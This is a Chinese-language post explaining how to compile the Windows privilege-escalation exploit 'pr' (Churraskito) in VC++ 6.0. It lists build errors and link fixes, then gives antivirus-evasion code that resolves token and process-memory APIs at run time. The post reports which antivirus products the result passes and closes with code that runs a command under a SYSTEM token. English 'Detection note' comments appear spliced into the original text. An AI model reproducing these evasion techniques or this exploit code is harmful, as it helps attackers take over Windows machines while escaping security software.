这里的源码是暗组上提供的、由 KOOPie 编写的 pr。
这些利用工具的源码都是在 VS 2003 下写的，其编译环境和 VC 不太一样，因此编译时会出现各种各样的问题。
下面我们就以 VC++ 6.0 为例来编译 pr。
环境:vc++6.0
缺少的文件：sshwbemhelpers.h（2003 服务器特有的），所以需要到网上下载，并放到 X:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h
e:\teamprogram\visualc++6.0\pr\churraskito\stdafx.h(10) : fatal error C1083: Cannot open include file: 'SshWbemHelpers.h': No such file or directory stdafx.cpp
e:\teamprogram\visualc++6.0\pr\churraskito\stdafx.h(10) : fatal error C1083: Cannot open include file: 'SshWbemHelpers.h': No such file or directory
执行 cl.exe 时出错.
工程设置:
Project Settings --> Link --> 对象/库模块 后面添加以下几个库，否则会出现下面几种链接错误：
psapi.lib wsock32.lib Ws2_32.lib xolehlp.lib
d:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h(23) : warning C4068: unknown pragma
d:\program files\microsoft visual studio\vc98\include\sshwbemhelpers.h(769) : warning C4068: unknown pragma
stdafx.cpp
Linking...
Churraskito.obj : error LNK2001: unresolved external symbol _GetModuleBaseNameA@16
Churraskito.obj : error LNK2001: unresolved external symbol _EnumProcessModules@16
Churraskito.obj : error LNK2001: unresolved external symbol __imp__connect@12
Churraskito.obj : error LNK2001: unresolved external symbol __imp__inet_addr@4
Churraskito.obj : error LNK2001: unresolved external symbol __imp__htons@4
Churraskito.obj : error LNK2001: unresolved external symbol __imp__bind@12
Churraskito.obj : error LNK2001: unresolved external symbol __imp__WSASocketA@24
Churraskito.obj : error LNK2001: unresolved external symbol __imp__WSAStartup@8
Debug/Churraskito.exe : fatal error LNK1120: 8 unresolved externals
*******************************************免杀**********************************************
nod32:
LookupAccountSid
DuplicateTokenEx
// Function-pointer type for ADVAPI32!LookupAccountSidA; the parameter list
// mirrors the SDK prototype (the __in/__out SAL macros appear to be copied
// from the SDK header).
typedef WINADVAPI BOOL (WINAPI *LookupAccountSidAT)
(
__in_opt LPCSTR lpSystemName,
__in PSID Sid,
__out_ecount_part_opt(*cchName, *cchName + 1) LPSTR Name,
__inout LPDWORD cchName,
__out_ecount_part_opt(*cchReferencedDomainName, *cchReferencedDomainName + 1) LPSTR ReferencedDomainName, __inout LPDWORD cchReferencedDomainName,
__out PSID_NAME_USE peUse
);
// Resolved at run time through LoadLibrary/GetProcAddress rather than an
// import-table entry; the page lists this as the call NOD32 flagged.
// Detection note: a binary that reaches SID/token APIs only via
// GetProcAddress, with no corresponding import, is itself a commonly
// monitored indicator. The module handle is never released and a NULL
// GetProcAddress result is not checked.
LookupAccountSidAT pLookupAccountSidA = (LookupAccountSidAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"LookupAccountSidA");
// Function-pointer type for ADVAPI32!DuplicateTokenEx; same parameter list
// as the SDK prototype.
typedef WINADVAPI BOOL (WINAPI *DuplicateTokenExT)
(
__in HANDLE hExistingToken,
__in DWORD dwDesiredAccess,
__in_opt LPSECURITY_ATTRIBUTES lpTokenAttributes,
__in SECURITY_IMPERSONATION_LEVEL ImpersonationLevel,
__in TOKEN_TYPE TokenType,
__deref_out PHANDLE phNewToken
);
// Resolved at run time instead of being imported; the page lists this as the
// second call NOD32 flagged. Detection note: token duplication reached
// through GetProcAddress without an import entry is a common hunting
// signal for token-manipulation tooling. The GetProcAddress result is used
// without a NULL check.
DuplicateTokenExT pDuplicateTokenEx = (DuplicateTokenExT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"DuplicateTokenEx");
kaspersky:过
Avira AntiVir :过
mcafee: 过
AVG: 过
symantec企业版:过
Norton AntiVirus:过
360全套:过
金山毒霸全套:
// Function-pointer type for KERNEL32!VirtualProtectEx (changes page
// protection in another process); parameter list mirrors the SDK prototype.
typedef WINBASEAPI BOOL (WINAPI *VirtualProtectExT)
(
__in HANDLE hProcess,
__in LPVOID lpAddress,
__in SIZE_T dwSize,
__in DWORD flNewProtect,
__out PDWORD lpflOldProtect
);
// Resolved at run time rather than imported; the page lists this under the
// Kingsoft (金山) section. Detection note: cross-process protection changes
// paired with WriteProcessMemory are a classic behavioural indicator that
// host-based monitoring watches regardless of how the API is resolved.
VirtualProtectExT pVirtualProtectEx = (VirtualProtectExT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"VirtualProtectEx");
// Function-pointer type for KERNEL32!WriteProcessMemory (writes into another
// process's address space); parameter list mirrors the SDK prototype.
typedef WINBASEAPI BOOL (WINAPI *WriteProcessMemoryT)
(
__in HANDLE hProcess,
__in LPVOID lpBaseAddress,
__in_bcount(nSize) LPCVOID lpBuffer,
__in SIZE_T nSize,
__out_opt SIZE_T * lpNumberOfBytesWritten
);
// Resolved at run time rather than imported. Detection note: a cross-process
// write is observable at the kernel/ETW level independently of the import
// table, so this indirection only affects static scanning. The module
// handle is leaked and the GetProcAddress result is not validated.
WriteProcessMemoryT pWriteProcessMemory = (WriteProcessMemoryT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"WriteProcessMemory");
// Function-pointer type for ADVAPI32!GetTokenInformation; parameter list
// mirrors the SDK prototype.
typedef WINADVAPI BOOL (WINAPI *GetTokenInformationT)
(
__in HANDLE TokenHandle,
__in TOKEN_INFORMATION_CLASS TokenInformationClass,
__out_bcount_part_opt(TokenInformationLength, *ReturnLength) LPVOID TokenInformation,
__in DWORD TokenInformationLength,
__out_opt PDWORD ReturnLength
);
// Resolved at run time rather than imported, like the other token APIs on
// this page. Detection note: the resulting token queries are visible to
// runtime monitoring either way; only the static import list changes.
// The GetProcAddress result is not checked for NULL before use.
GetTokenInformationT pGetTokenInformation = (GetTokenInformationT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"GetTokenInformation");
金山主动防御能过；金山杀毒扫描能扫出来，但执行时不提示。它报的是下面两个自定义函数：
DelRegistrySubkeys 和 RunCommandAsSystem
DelRegistrySubkeys();
printf ("/xxoo/-->Running command with SYSTEM Token...\n");
if (RunCommandAsSystem(hTokenOut, lpCommand))
{
printf ("/xxoo/-->Done, command should have ran as SYSTEM!\n");
return 0;
}